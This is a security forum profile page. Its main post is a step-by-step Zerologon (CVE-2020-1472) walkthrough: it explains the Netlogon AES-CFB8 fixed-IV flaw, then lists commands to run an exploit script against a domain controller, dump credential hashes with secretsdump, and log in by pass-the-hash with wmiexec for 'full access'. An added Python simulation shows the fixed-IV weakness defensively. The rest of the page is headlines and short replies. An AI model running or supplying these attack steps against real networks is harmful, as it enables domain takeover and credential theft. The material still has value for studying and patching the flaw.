AdminSec

Administrators 
  • Content Count

    256
  • Joined

  • Last visited

  • Days Won

    58
  • Points

    227,479

AdminSec last won the day on October 25

AdminSec had the most liked content!

Community Reputation

103 Excellent

9 Followers

About AdminSec

  • Rank
    Developer by day, Ninja by night

Register Information

  • Birth date
    11/15/85
  • Experience in years
    10
  • Your ambitions
    Create the perfect community
  • Your Favorite domains
    Pentest

Recent Profile Visitors

23859 profile views
  1. AdminSec

    CVE-2020-1472

    Hello, today I will show you the "Zerologon" exploit!

    CVE-2020-1472 is a privilege escalation vulnerability due to the insecure usage of AES-CFB8 encryption for Netlogon sessions. The AES-CFB8 standard requires that each byte of plaintext, like a password, must have a randomized initialization vector (IV) so that passwords can't be guessed. The ComputeNetlogonCredential function in Netlogon sets the IV to a fixed 16 bits, which means an attacker could control the deciphered text.

    An attacker can exploit this flaw to impersonate the identity of any machine on a network when attempting to authenticate to the Domain Controller (DC). Further attacks are then possible, including the complete takeover of a Windows domain. Secura's whitepaper also notes that an attacker would be able to simply run Impacket's 'secretsdump' script to pull a list of user hashes from a target DC.

    In order to exploit this vulnerability, the attacker would need to launch the attack from a machine on the same Local Area Network (LAN) as their target. A vulnerable client or DC exposed to the internet is not exploitable by itself. The attack requires that the spoofed login works like a normal domain login attempt. Active Directory (AD) would need to recognize the connecting client as being within its logical topology, which external addresses wouldn't have.

    First step:

    Download Impacket:

        git clone [Hidden Content]

    Download ZeroLogon exploit:

        git clone [Hidden Content]

    Steps to compromise the DC:

        cd impacket
        pip3 install .
        cd ../cve-2020-1472
        python3 cve-2020-1472.py <DCNAME> <IPAddress>

    After that you can see this result.

    You can now connect to the DC, but first take the hash!

        cd ../impacket/examples/
        python3 secretdump.py -just-dc -no-pass '<DOMAIN/DCNAME@IP.AD.DR.ESS'

    After that you have the hash of the administrator. You can use it to open a session on the DC with wmiexec!

        wmiexec.py -hashes <:yourhash> '<DOMAIN/DCNAME@IP.AD.DR.ESS'

    You now have full access! 🙂
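The fixed-IV weakness in AES-CFB8 that the post describes, shown as an added example that is not part of the original post or of the tools it links. It shows why a constant IV lets an all-zero input produce an all-zero output for roughly 1 key in 256, and why a fresh random IV removes that property. Assumptions: the fixed IV is modelled as 16 zero bytes (as in Secura's whitepaper), a keyed SHA-256 function stands in for AES because CFB only runs the cipher in the forward direction, and the keys are constructed sample values.

```python
import hashlib
import os

BLOCK = 16  # AES block size in bytes

def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES (assumption): CFB only runs the cipher forwards,
    so a keyed SHA-256 PRF shows the same behaviour without a crypto library."""
    return hashlib.sha256(key + block).digest()[:BLOCK]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: one ciphertext byte per cipher call, then shift that byte into the state."""
    state, out = bytes(iv), bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, state)[0]
        out.append(c)
        state = state[1:] + bytes([c])
    return bytes(out)

def constructed_key(i: int) -> bytes:
    """Deterministic sample session keys (constructed for this example)."""
    return hashlib.sha256(b"constructed-key-%d" % i).digest()[:16]

def all_zero_hits(make_iv, trials: int = 20000, length: int = 8) -> int:
    """Count keys for which an all-zero plaintext encrypts to an all-zero ciphertext."""
    zeros = bytes(length)
    return sum(cfb8_encrypt(constructed_key(i), make_iv(), zeros) == zeros
               for i in range(trials))

def fixed_zero_iv() -> bytes:
    # Flawed choice: with state 0^16 and output byte 0 the state never changes,
    # so one lucky first byte (chance 1/256) makes every following byte 0 as well.
    return bytes(BLOCK)

def fresh_random_iv() -> bytes:
    # What CFB8 expects: an unpredictable IV per message. The state then differs
    # at every step, so eight zero bytes need eight independent 1/256 events.
    return os.urandom(BLOCK)

if __name__ == "__main__":
    n = 20000
    print("fixed zero IV  :", all_zero_hits(fixed_zero_iv, n), "of", n, "(about n/256)")
    print("fresh random IV:", all_zero_hits(fresh_random_iv, n), "of", n)
```

This is why the fix has to be enforced on the server side: a peer that can retry freely only needs the zero-IV case to succeed once.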
  2. Windows Server Netlogon Exploit Code Publicly Exposed
  3. Hello, could we have more context on the challenges?
  4. AdminSec

  5. Hello, most of the time just an update can correct this; plug in your RJ45 and update.
  6. Researchers Uncover Novel Way to De-anonymize Device IDs to Users' Biometrics